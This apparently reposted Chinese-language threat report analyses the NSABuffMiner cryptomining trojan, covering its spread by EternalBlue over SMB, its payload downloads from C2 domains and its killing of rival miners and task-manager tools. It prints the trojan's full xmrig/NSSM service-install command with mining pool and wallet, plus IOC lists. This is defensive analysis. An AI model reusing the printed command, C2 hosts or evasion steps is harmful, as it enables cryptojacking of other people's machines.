近期騰訊御見威脅情報中心接到使用者反饋，某學校內網水卡管理伺服器被植入名為rundllhost.exe的挖礦木馬。分析後發現該木馬是NSASrvanyMiner挖礦木馬的變種，此木馬同樣利用NSA武器工具在內網攻擊傳播，而該伺服器存在未修復的ms17-010漏洞，因此受到攻擊被利用挖礦。 0×1背景

近期騰訊御見威脅情報中心接到使用者反饋，某學校內網水卡管理伺服器被植入名為rundllhost.exe的挖礦木馬。分析後發現該木馬是NSASrvanyMiner挖礦木馬的變種，此木馬同樣利用NSA武器工具在內網攻擊傳播，而該伺服器存在未修復的ms17-010漏洞，因此受到攻擊被利用挖礦。

該木馬傳播NSA武器工具包的釋放目錄：C:\Windows\IIS\，其中一個C2通訊地址： posthash.org均與NSASrvanyMiner相同，因此我們認為此挖礦木馬是NSASrvanyMiner的變種。

查詢NSABuffMiner挖礦木馬使用錢包資訊，發現該錢包累計挖礦已獲得收益高達115萬元人民幣。

1.png

受攻擊伺服器程序列表

NSABuffMiner挖礦木馬配備了功能強大的NSA工具包，以便在內網攻擊傳播。該木馬為獨佔系統挖礦資源，會查殺30餘個同樣是挖礦木馬的程序，在自己入侵成功之後，還會將135、137、138、139、445等危險埠關閉。其目的是防止其他挖礦木馬順路入侵，再和自己爭搶挖礦資源。

NSABuffMiner挖礦木馬會檢測多個工作管理員的程序，一旦使用者發現系統異常，啟用（Taskmgr.exe、Autoruns.exe、360taskmgr.exe、Perfmon.exe、Procxp.exe、processHacker.exe）等工作管理員檢視系統資源佔用情況時，木馬會立刻嘗試關閉工作管理員。若關閉失敗，木馬會立刻退出。

騰訊御見威脅情報中心提醒企業網管，及時修補內網系統高危漏洞，可配置密碼策略，強制內網使用者使用複雜密碼。這些存在漏洞的系統若被黑客攻擊控制，除了可能感染挖礦木馬，還可能被竊取資料、植入勒索病毒，造成更加嚴重的後果。

0×2 詳細分析

0×2.1 NSA攻擊

木馬執行後在C:\windows\IIS\目錄釋放66個子檔案，攻擊時先關閉防火牆，然後啟動CPUInfo.exe掃描內網機器的445埠，如果埠處於開啟狀態則利用多個NSA武器工具（Eternalblue等）對目標機器進行攻擊，若攻擊成功，則根據不同系統版本在受害機器上執行payload(x86/x64.dll),x86/x64.dll執行後從C2地址繼續下載挖礦和NSA攻擊模組並安裝執行。

2.png

將CPUInfo.exe安裝為計劃任務“GooglePinginConfigs”，並將計劃任務檔案設定屬性為隱藏。

3.png

攻擊主程序CPUInfo.exe關閉防火牆，掃描內網IP並使用NSA武器工具：Eternalblue(永恆之藍),Doubleplsar(雙脈衝星)、EternalChampion(永恆冠軍)、Esteemaudit（RDP漏洞攻擊）對內網機器進行攻擊，若攻擊成功則植入DllPayload:x64/x86.dll。

4.png

攻擊結束後free.bat清理攻擊程序，重啟計劃任務。

5.png

0×2.2 Payload分析

0×2.2.1 Install.exe

攻擊後植入的payload(x86/x64/dll)執行後從da.alibuf.com下載NSA攻擊包安裝程式445.exe，儲存為C:\Windows\Install.exe並啟動安裝。

6.png

Install.exe重新安裝攻擊模組到IIS目錄，從而繼續挖礦和感染。

7.png

0×2.2.2 mask.exe

payload(x86/x64/dll)執行後從da.alibuf.com下載挖礦安裝包程式mado.exe，儲存為C:\Windows\mask.exe並啟動安裝。

8.png

mask.exe啟動demo.bat

9.png

C:\windows\demo.bat通過wmic指令對同行挖礦木馬查殺，以獨享挖礦資源。

10.png

此挖礦木馬在清除其他同行挖礦木馬方面可謂做足了工作，通過查詢疑似挖礦木馬，累計清除10餘個目錄下30餘個程序名。

查詢並殺死程序

wbmoney.exe

GGtbviewer.exe

lservice.exe

ystmss.exe

wuauc1t.exe

Systmss.exe

1.exe

2.exe

3.exe

nanol.exe

svchostr.exe

csrss…exe

wax.exe

Snwhtdw.bat

dllhsot.exe

Tasksvr.exe

serices.exe

seever.exe

mssecsvc.exe

svchsot.exe

lsacs.exe

nsa.exe

csrs.exe

svchost.exe

server.exe

conhost.exe

csrss.exe

expl0rer.exe

查詢可疑路徑

C:\windows\svchost.exe

C:\program files (x86)\stormii\server.exe

C:\program files (x86)\windows nt\conhost.exe

C:\Windows\svchost.exe

C:\ProgramData\dll\svchost.exe

C:\ProgramData\dll\csrss.exe

C:\ProgramData\expl0rer.exe

C:\ProgramData\Natioanl\svchostr.exe

C:\ProgramData\Microsoft\Natihial\cmd.exe

C:\ProgramData\Microsoft\Natioanl\csrss…exe

C:\ProgramData\nm\winlogin.exe

C:\Windows\Fonts\explorer.exe

C:\Windows\Fonts\conhost.exe

C:\Windows\SecureBootThemes\Microsoft\svchost.exe

C:\windows\sysprepthemes\microsoft\svchost.exe

C:\Windows\SpeechsTracing\Microsoft\svchost.exe

C:\ProgramData\Natihial\svshostr.exe

C:\ProgramData\new\csrss.exe

C:\ProgramData\new\csrss.exe

指令碼會繼續關閉135，137，138，139，445埠，避免其他挖礦木馬入侵機器。

11.png

然後從另一個C2地址bmw.hobuff.info:3下載sogou.exe、360safe.exe等木馬進而挖礦和新一輪感染。

12.png

13.png

0×2.3 挖礦

受感染機器下載的挖礦木馬釋放svchost.exe、wininit.exe、rundllhost.exe到C:\Windows\Fonts目錄，其中svchost.exe是NSSM安裝程式，wininit.exe是礦機啟動程式，rundllhost.exe是xmrig礦機。

14.png

啟動礦機前嘗試結束以下監控或分析工具：

Taskmgr.exe

Rundll32.exe

Autoruns.exe

Perfmon.exe

Procxp.exe

processHacker.exe

15.png

如果仍然檢測到以下程序則退出挖礦程式：

Taskmgr.exe

Autoruns.exe

360taskmgr.exe

Perfmon.exe

Procxp.exe

processHacker.exe

16.png

礦機rundllhost.exe採用開源挖礦木馬xmrig 2.5.2編譯 IT資源論壇：www.euei.com.cn 17.png

啟動礦機命令列如下，啟動時使用NSSM服務管理工具將礦機安裝為系統服務，此工具具有自動守護目標服務程序功能，能維持挖礦程序執行，同時可以躲避部分殺軟檢測。

c:\windows\Fonts\svchost.exe install Samserver rundllhost.exe -o x.alibuf.com:443 -u 45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U 35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr -p x -k

18.png

19.png

錢包：45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr

錢包資訊：

20.png

查詢錢包資訊發現目前已挖礦獲得門羅幣1217.9720個，當前價格摺合人民幣1150788.73元。

21.png

0×3 安全建議

1、伺服器關閉不必要的埠，例如139、445埠等。

2. 手動安裝“永恆之藍”漏洞補丁請訪問以下頁面

其中WinXP，Windows Server 2003使用者請訪問

3、企業使用者建議全網安裝御點終端安全管理系統

22.png

4、個人使用者推薦使用騰訊電腦管家，攔截此類病毒攻擊。

0×4 IOCs

C2（部分）

124.232.138.166:3

61.130.31.174:3

221.130.176.203

60.191.206.66

67.229.157.146

220.194.215.229

md5

2cdda243568a10b34936220ebe9b3995

f36fbb000aca01302c74895936b818b3

7f142f5e800096af5de5160ba5caa91e

9ae5a6b60a3f29e14aa2b29a03e55bc8

db39c2043a72537274d4f92b2240fd9c

a755f76611af191caac97da04633b012

1b41317b15287ab681defabc66ef638b

d83c9f5919915fc6c54276d6d0e79bf4

36543e571a50ac91acd5c9e9c5de36fb

064ede68095b3ab5d8a22da2d1e59c02

2e332960bf1feb4aa90b156322c7e98d

d376172100a4cf4e91531277cc368294

931350ab9d8c235f48219c4e126bd6cd

1065f9b7c189f4a22d7f11626f16b976

7add4dd082e2e84ea7ea41a48a267450

584c2211a059c4018d2eddf8f669d63d

f8408d85ade39d73c3c4bdf692a26c01

a94ecd370a2bae1381a40c9b6d7a300c

27c1f49ad677dff41ed3537e9e299868

081f10718d76c9b3b19901f0ee630960

04c5dab014e1b8640ce9ea9580bb0b09

e9c6bf0de42aa2449f1ed4bbb50ddcd6

a17bd95441d3fa37660e87842dc896aa

9feecd709f395bd8a0d1d3a2e77d2e34

857fc3145d5aee4399bf6c9fd9dc8245

69833a3ecc52f57a02656d46e1799dcc

11275993a1a8f44371ab48820422b273

596a05756e87176b56d205fd38f2947e

d1d15aa8d749e61a06c8ed04454827b3

7ac8d07cec8264b00139f5575c3a4a71

8a4e9f688c6d0effd0fa17461352ed3e

b8af096248b3e7283f69a6c668609408

c673e31da52314ac65e583f8409f097e

ce5f524f8dc3c01ad7e67a21d0d6a754

e2108aa70c161208ffdcbf5c60a862cc

9aa087a88e766a49a9d4ae0a5e8c2b02

29f15fd8103a69e81fde23e4592baa60

37a98c6150d2317eb6e0df1516a5b3a4

873c5bc9bbf95db1b4e51374231245ae

a28e6a0150d00c0cbcf6b11e70b384cf

d42b7eb22678a6c35674fde3aaae0cb3

56398c3eb7453017af674ab85df17386

6852f47732e3560f997af626094a5a99

6e1bbd373fc929f83160d4a40ce09d65

8f55f1381ce6bc1a4ee50bde5895b3a1